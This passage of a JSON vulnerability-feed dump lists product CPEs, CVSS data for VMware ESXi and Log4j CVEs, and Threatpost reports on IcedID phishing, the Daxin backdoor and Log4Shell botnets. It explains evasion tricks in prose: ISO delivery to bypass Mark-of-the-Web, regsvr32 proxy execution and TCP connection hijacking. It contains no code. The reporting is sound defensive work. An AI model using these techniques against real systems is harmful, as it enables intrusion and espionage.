"cpe:2.3:a:siemens:nx:*:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:spectrum_power_4:4.70:sp8:*:*:*:*:*:*", "cpe:2.3:a:siemens:operation_scheduler:1.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:identity_services_engine:2.4.0:-:*:*:*:*:*:*", "cpe:2.3:a:siemens:vesys:2019.1:sp1912:*:*:*:*:*:*", "cpe:2.3:a:cisco:sd-wan_vmanage:20.5:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:finesse:12.6\\(1\\):es01:*:*:*:*:*:*", "cpe:2.3:a:cisco:enterprise_chat_and_email:12.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:sd-wan_vmanage:20.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:dna_center:2.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:percussion:rhythmyx:7.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:dna_spaces:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_threat_defense:7.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:smart_phy:3.1.3:*:*:*:*:*:*:*"]}], "prion": [{"lastseen": "2023-11-22T00:36:05", "description": "ESXi contains a slow HTTP POST denial-of-service vulnerability in rhttpproxy. 
A malicious actor with network access to ESXi may exploit this issue to create a denial-of-service condition by overwhelming rhttpproxy service with multiple requests.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-02-16T17:15:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22050"], "modified": "2022-02-25T17:57:00", "id": "PRION:CVE-2021-22050", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2021-22050", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-11-22T00:36:05", "description": "VMware ESXi, Workstation, and Fusion contain a use-after-free vulnerability in the XHCI USB controller. 
A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine's VMX process running on the host.", "cvss3": {"exploitabilityScore": 0.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.7, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-16T17:15:00", "type": "prion", "title": "Double free", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22040"], "modified": "2022-02-24T19:43:00", "id": "PRION:CVE-2021-22040", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2021-22040", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T00:36:04", "description": "VMware ESXi contains an unauthorized access vulnerability due to VMX having access to settingsd authorization tickets. 
A malicious actor with privileges within the VMX process only, may be able to access settingsd service running as a high privileged user.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-16T17:15:00", "type": "prion", "title": "Improper access control", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22042"], "modified": "2022-02-25T18:07:00", "id": "PRION:CVE-2021-22042", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2021-22042", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T00:36:06", "description": "VMware ESXi, Workstation, and Fusion contain a double-fetch vulnerability in the UHCI USB controller. 
A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine's VMX process running on the host.", "cvss3": {"exploitabilityScore": 0.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.7, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-16T17:15:00", "type": "prion", "title": "Double free", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22041"], "modified": "2022-02-24T19:50:00", "id": "PRION:CVE-2021-22041", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2021-22041", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T00:36:06", "description": "VMware ESXi contains a TOCTOU (Time-of-check Time-of-use) vulnerability that exists in the way temporary files are handled. 
A malicious actor with access to settingsd, may exploit this issue to escalate their privileges by writing arbitrary files.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-16T17:15:00", "type": "prion", "title": "Code injection", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22043"], "modified": "2022-02-24T19:51:00", "id": "PRION:CVE-2021-22043", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2021-22043", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T01:07:03", "description": "Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. 
From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-10T10:15:00", "type": "prion", "title": "Default configuration", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-04-03T20:15:00", "id": "PRION:CVE-2021-44228", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2021-44228", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2022-03-29T14:30:43", "description": "The ever-evolving [banking trojan IcedID](<https://threatpost.com/icedid-web-forms-google-urls/165347/>) is back again with a phishing campaign that uses previously compromised Microsoft Exchange servers to send emails that appear to come from legitimate accounts. 
Attackers also are using stealthy new payload-delivery tactics to spread the modular malware.\n\nResearchers from [Intezer](<https://www.intezer.com/>) earlier this month uncovered the campaign, which employs thread hijacking to send malicious messages from stolen Exchange accounts, thus adding an extra level of evasion to the campaign\u2019s malicious intent, wrote researchers [Joakim Kennedy](<https://www.intezer.com/author/jkennedy/>) and [Ryan Robinson](<https://www.intezer.com/author/ryanrobinson/>) [in a blog post](<https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/>) published Monday.\n\nThe actors behind IcedID \u2013 as well as other spearphishers \u2013 have previously used phishing emails that \u201creuse previously stolen emails to make the lure more convincing,\u201d researchers wrote. However, this time the threat has evolved in a couple of key ways that make it even more dangerous to targets, which include organizations within energy, healthcare, law and pharmaceutical sectors, researchers noted.\n\nNot only is the threat actor now using compromised Microsoft Exchange servers to send the phishing emails from the account that they stole from, but the delivery of the malicious payload also has shifted in a way that can execute malware without the user even knowing, researchers said.\n\n\u201cThe payload has also moved away from using office documents to the use of ISO files with a Windows LNK file and a DLL file,\u201d researchers wrote. 
\u201cThe use of ISO files allows the threat actor to bypass the [Mark-of-the-Web](<https://attack.mitre.org/techniques/T1553/005/>) controls, resulting in execution of the malware without warning to the user.\u201d\n\nPreviously the infection chain most commonly associated with IcedID phishing campaigns has been an email with an attached password-protected ZIP archive that contains a macro-enabled Office document, which executes the IcedID installer.\n\n## **Breakdown of the Attack Chain**\n\nThe new campaign starts with a phishing email that includes a message about an important document and includes a password-protected ZIP archive file attached, the password for which is included in the email body.\n\nThe email seems extra convincing to users because it uses what\u2019s called \u201cthread hijacking,\u201d in which attackers use a portion of a previous thread from a legitimate email found in the inbox of the stolen account.\n\n\u201cBy using this approach, the email appears more legitimate and is transported through the normal channels which can also include security products,\u201d researchers wrote.\n\nThe majority of the originating Exchange servers that researchers observed in the campaign appear to be unpatched and publicly exposed, \u201cmaking the ProxyShell vector a good theory,\u201d they wrote. [ProxyShell](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) is a remote-code execution (RCE) bug discovered in Exchange Servers last year that has since been patched but has been [throttled by attackers](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>).\n\nOnce unzipped, the attached file includes a single \u201cISO\u201d file with the same file name as the ZIP archive that was created not that long before the email was sent. 
That ISO file includes two files: a LNK file named \u201cdocument\u201d and a DLL file named \u201cmain,\u201d also prepared relatively recently and potentially used in previous phishing email, researchers said.\n\nWhen a user double clicks the LNK file, it uses \u201cregsvr32\u201d to execute the DLL file, which allows for proxy execution of malicious code in main.dll for defense evasion, they wrote in the post. The DLL file is a loader for the IcedID payload.\n\nThe loader will locate the encrypted payload, which is stored in the resource section of the binary, through the technique API hashing. The resulting hash is then compared with a hardcoded hash, locating the call for FindResourceA, which is dynamically called to fetch the encrypted payload, researchers wrote.\n\nThe ultimate step in the attack chain is that the IcedID \u201cGziploader\u201d payload is decoded and placed in memory and then executed. The GZiploader fingerprints the machine and sends a beacon to the command-and-control (C2) server \u2013 located at yourgroceries[.]top_._ \u2013 with information about the infected host, which then can be used for further nefarious activity.\n\n## **Evolution of a Threat**\n\nResearchers at IBM first discovered IcedID [back in 2017](<https://threatpost.com/new-icedid-trojan-targets-us-banks/128851/>) as a trojan targeting banks, payment card providers, mobile services providers, payroll, web mail and e-commerce sites.\n\nThe malware has [evolved over the years](<https://threatpost.com/botnet-operators-team-up-to-leverage-icedid-trickbot-trojans/132392/>) and already has a storied history of clever obfuscation. 
For example, it [resurfaced](<https://threatpost.com/icedid-banker-adding-steganography-covid-19-theme/156718/>) during the [COVID-19 campaign](<https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware>) with new functionality that uses steganography \u2013 the practice of hiding code within images to stealthily infect victims \u2013 as well as other enhancements.\n\nThe new campaign is evidence of its [further evolution](<https://threatpost.com/spam-icedid-banking-trojan-variant/167250/>) and could signify that IcedID is indeed becoming, [as many fear](<https://threatpost.com/icedid-banking-trojan-surges-emotet/165314/>), the new [Emotet](<https://threatpost.com/emotet-takedown-infrastructure-netwalker-offline/163389/>) \u2013 a modular threat that began as a trojan but steadily evolved into one of the most dangerous malwares ever seen.\n\n\u201cThis attack shows how much effort attackers put in all the time to evade detection and why defense in depth is necessary,\u201d observed Saumitra Das, CTO and co-founder at security firm [Blue Hexagon](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATURk7nu5DOXPXjQHtUbQPB-2Bo-3Dj4oZ_6bll2uIcECOBsx1gx1IC2zx-2FnKyCXka4AgKvEYqpnW0-2BDbBUicS42bKww9XV5LeOm8YSoCZbw6XkWDSfAMcb8GJOp9iX7pVlW-2BkiIYpN1sif0KFuJYXLhOJYPn-2B9Sn-2Baowev7BWgf7-2Fsft7vhZ-2FleI4B1CtNAbekmGpeBhmEFQ0kWRSkTE0FzXKh-2Bz963fPXZn0hvo6ZGATosJpWWMJIx2kznvRhglY0WQkeZMakpGSSCIz9LKVoA7IXOHVn5P16MOaoTEh1LFaqgv30hL1UfNg9Za-2FKpoEtnwzBDLz4DtQVA3dFYwDxuvZKeD9Y8Hi4WQLnSai8UFna4-2BIEwYtA0NcX5KrsjsbSEnjBzFNfZ-2B0-3D>), in an email to Threatpost.\n\nThis time and effort, in turn, shows a level of sophistication on the part of those behind IcedID in that they have thorough knowledge of contemporary email protections and are continuously adding new tactics as security also grows and evolves, he said.\n\n\u201cMany email security systems use reputation of senders to block malicious email without 
being able to assess the email itself,\u201d Das noted. \u201cHere, they used compromised Exchange servers to make it through.\u201d\n\nThe group\u2019s use of obfuscated file formats to deliver malware, as well as the final payload\u2019s delivery over the network, also demonstrate that the threat actors know how to evade signature and sandboxes, he added.\n\n\u201cThese attacks often go much deeper than simply stealing data,\u201d concurred Chris Clements, vice president of solutions architecture at security firm [Cerberus Sentinel](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUc1h7F6EeKyqQHDAzxY6FeBG4AZ1lNaZ-2Fme9HKLAKT7PZQLK_6bll2uIcECOBsx1gx1IC2zx-2FnKyCXka4AgKvEYqpnW0-2BDbBUicS42bKww9XV5LeOm8YSoCZbw6XkWDSfAMcb8IRiPIGKWMahkivu0WTh5PX5dG77IJVWKxIQtQJVv-2BIYMmRr5z7OIF8mKih-2F25UI0RQa6-2Bdcn0eyt9a-2F-2BxbdAQ8flodV7haNCcr-2BW1iLqgw0DYt7ntjLmuD7PDGwxwwHSq2gHGWVXVmYGWcDbHq95V0DcFYQggLtmHop2EFskxujGp5A7HFr4-2Bzu8HP-2Fn84dnll5nv7EwsYGa4Z-2BkWEdDcrCAY75JBexQSBfFsv2LbL-2Bn1Qz-2FYzen2NsuzLcfAC1av2zq9EhGfkk9KycL0qVySQ-3D>)**, **in an email to Threatpost. \u201cThe cybercriminals take the time to read through the mailboxes to understand the inter-organization relationships and operating procedures.\n\n\u201cTo protect themselves from similar attacks, it\u2019s critical that organizations ensure that they apply security patches promptly and thoroughly in their environment,\u201d he added. However, what is historically true for patching remains true now: that it\u2019s \u201ca task that\u2019s easier said than done,\u201d Clemens acknowledged.\n\n\u201cIt really takes a cultural approach to cybersecurity to plan for failures in defenses like patch management,\u201d he said.\n\n**_Moving to the cloud? 
Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-29T14:02:41", "type": "threatpost", "title": "Exchange Servers Speared in IcedID Phishing Campaign", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-29T14:02:41", "id": "THREATPOST:8243943141B8F18343765DA77D33F46C", "href": "https://threatpost.com/exchange-servers-speared-in-icedid-phishing-campaign/179137/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-01T18:09:38", "description": "The Daxin malware is taking aim at hardened government networks around the world, according to researchers, with the goal of cyberespionage.\n\nThe Symantec Threat Hunter 
team noticed the advanced persistent threat (APT) weapon in action in November, noting that it\u2019s \u201cthe most advanced piece of malware Symantec researchers have seen from [China-linked actors](<https://threatpost.com/victory-backdoor-apt-campaign/166700/>)\u2026exhibiting technical complexity previously unseen by such actors.\u201d\n\nThey added that Daxin\u2019s specific scope of operations includes reading and writing arbitrary files; starting and interacting with arbitrary processes; and advanced lateral movement and stealth capabilities.\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) also flagged the activity, which Symantec characterized as \u201clong-running.\u201d The earliest known sample of the malware dates from 2013, when it already had a large part of the codebase fully developed.\n\n\u201cDaxin malware is a highly sophisticated rootkit backdoor with complex, stealthy command-and-control (C2) functionality that enabled remote actors to communicate with secured devices not connected directly to the internet,\u201d warned CISA, in a [Monday alert](<https://www.cisa.gov/uscert/ncas/current-activity/2022/02/28/broadcom-software-discloses-apt-actors-deploying-daxin-malware>). \u201cDaxin appears to be optimized for use against hardened targets, allowing the actors to deeply burrow into targeted networks and exfiltrate data without raising suspicions.\u201d\n\n## **Built for Stealth**\n\nFrom a technical standpoint, Daxin takes the form of a Windows kernel driver, according to Symantec\u2019s [Monday analysis](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-backdoor-espionage>), and has a focus on stealth.\n\n\u201cDaxin\u2019s capabilities suggest the attackers invested significant effort into developing communication techniques that can blend in unseen with normal network traffic on the target\u2019s network,\u201d the firm found. 
\u201cSpecifically, the malware avoids starting its own network services. Instead, it can abuse any legitimate services already running on the infected computers.\u201d\n\nIt communicates with legitimate services via network tunneling, they added \u2013 and further, it can set up daisy-chain communications, researchers added to move internally via hops between several linked computers.\n\n\u201cDaxin is also capable of relaying its communications across a network of infected computers within the attacked organization,\u201d they said. \u201cThe attackers can select an arbitrary path across infected computers and send a single command that instructs these computers to establish requested connectivity. This use case has been optimized by Daxin\u2019s designers.\u201d\n\nDaxin also can hijack legitimate TCP/IP connections. According to Symantec, it monitors all incoming TCP traffic for certain patterns, and when a preferred pattern is detected, it disconnects the legitimate recipient and takes over the connection.\n\n\u201cIt then performs a custom key exchange with the remote peer, where two sides follow complementary steps. The malware can be both the initiator and the target of a key exchange,\u201d according to the analysis. \u201cA successful key exchange opens an encrypted communication channel for receiving commands and sending responses. Daxin\u2019s use of hijacked TCP connections affords a high degree of stealth to its communications and helps to establish connectivity on networks with strict firewall rules. It may also lower the risk of discovery by SOC analysts monitoring for network anomalies.\u201d\n\nWhen all of this is put together, the result is that a single command message that includes all the details required to establish communication, specifically the node IP address, its TCP port number and the credentials to use during custom key exchange. 
When Daxin receives this message, it picks the next node from the list.\n\nThe research team linked Daxin to Chinese actors because it\u2019s usually deployed alongside tools known to be associated with Chinese espionage actors.\n\n\u201cMost of the targets appear to be organizations and governments of strategic interest to China,\u201d they added. \u201cDaxin is without doubt the most advanced piece of malware Symantec researchers have seen used by a China-linked actor.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _****_[FREE downloadable eBook](<https://bit.ly/3Jy6Bfs>)_****_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists. _**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-01T17:55:46", "type": "threatpost", "title": "Daxin Espionage Backdoor Ups the Ante on Chinese Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": 
false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-01T17:55:46", "id": "THREATPOST:1CC682A86B6D521AD5E357B9DB3A1DFB", "href": "https://threatpost.com/daxin-espionage-backdoor-chinese-malware/178706/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:09:15", "description": "Cybersecurity professionals across the world have been scrambling to shore up their systems against a critical [remote code-execution (RCE) flaw ](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) (CVE-2021-44228) in the Apache Log4j tool, discovered just days ago.\n\nNow under active exploit, the \u201cLog4Shell\u201d bug allows complete server takeover. Researchers have started to fill in the details on the latest Log4Shell attacks, and they reported finding at least 10 specific Linux botnets leading the charge.\n\nFirst, analysts at NetLab 360 detected two waves of [Log4Shell attacks](<https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/>) on their honeypots, from the Muhstik and Mirai botnets.\n\n## **Mirai Tweaked to Troll for Log4Shell Vulnerability **\n\nThe analysts at Netlab 360 said this is a new variant of Mirai with a few specific innovations. 
First, they pointed out the code piece \u201ctable_init/table_lock_val/table_unlock_val and other Mirai-specific configuration management functions have been removed.\u201d\n\nSecondly, they added, \u201cThe attack_init function is also discarded, and the DDoS attack function is called directly by the command-processing function.\u201d\n\nFinally, they found this iteration of the Mirai botnet uses a two-level domain for its command-and-control (C2) mechanis,, which the team at Netlab 360 said was \u201crare.\u201d\n\n## **Muhstik Variant Attacks Log4Shell **\n\nThe other Linux botnet launched to take advantage of the Apache 4j Library flaw is [Muhstik](<https://threatpost.com/muhstik-botnet-attacks-tomato-routers/152079/>), a Mirai variant.\n\n\u201cIn this captured sample, we note that the new Muhstik variant adds a backdoor module, ldm, which has the ability to add an SSH backdoor public key with the following installed backdoor public key,\u201d Netlab 360 reported.\n\nOnce added, the public key lets a threat actor log onto the server without so much as a password, they explained.\n\n\u201cMuhstik takes a blunt approach to spread the payload aimlessly, knowing that there will be vulnerable machines, and in order to know who has been infected, Muhstik adopts TOR network for its reporting mechanism,\u201d the Netlab 360 team said.\n\nFollowing detection of those attacks, the Netlab 360 team [found](<https://blog.netlab.360.com/ten-families-of-malicious-samples-are-spreading-using-the-log4j2-vulnerability-now/>) other botnets on the hunt for the Log4Shell vulnerability including: DDoS family Elknot; mining family m8220; SitesLoader; xmrig.pe; xmring.ELF; attack tool 1; attack tool 2; plus one unknown and a PE family.\n\n## **Geography of Log4Shell Attacks **\n\nThe majority of [exploitation attempts against Log4Shell](<https://securelist.com/cve-2021-44228-vulnerability-in-apache-log4j-library/105210/>) originate in Russia, according to Kaspersky researchers who 
found 4,275 attacks launched from Russia, by far the most of any other region. By comparison, 351 attempts were launched from China and 1,746 from the U.S.\n\nSo far, the [Apache Log4j logging library exploit](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) has spun off 60 mutations \u2014 and it only took less than a day.\n\nThis story is developing, so stay tuned to Threatpost for [additional coverage](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>).\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats._**[ _REGISTER TODAY_](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This_**[ _LIVE, interactive Threatpost Town Hall_](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_, sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken. 
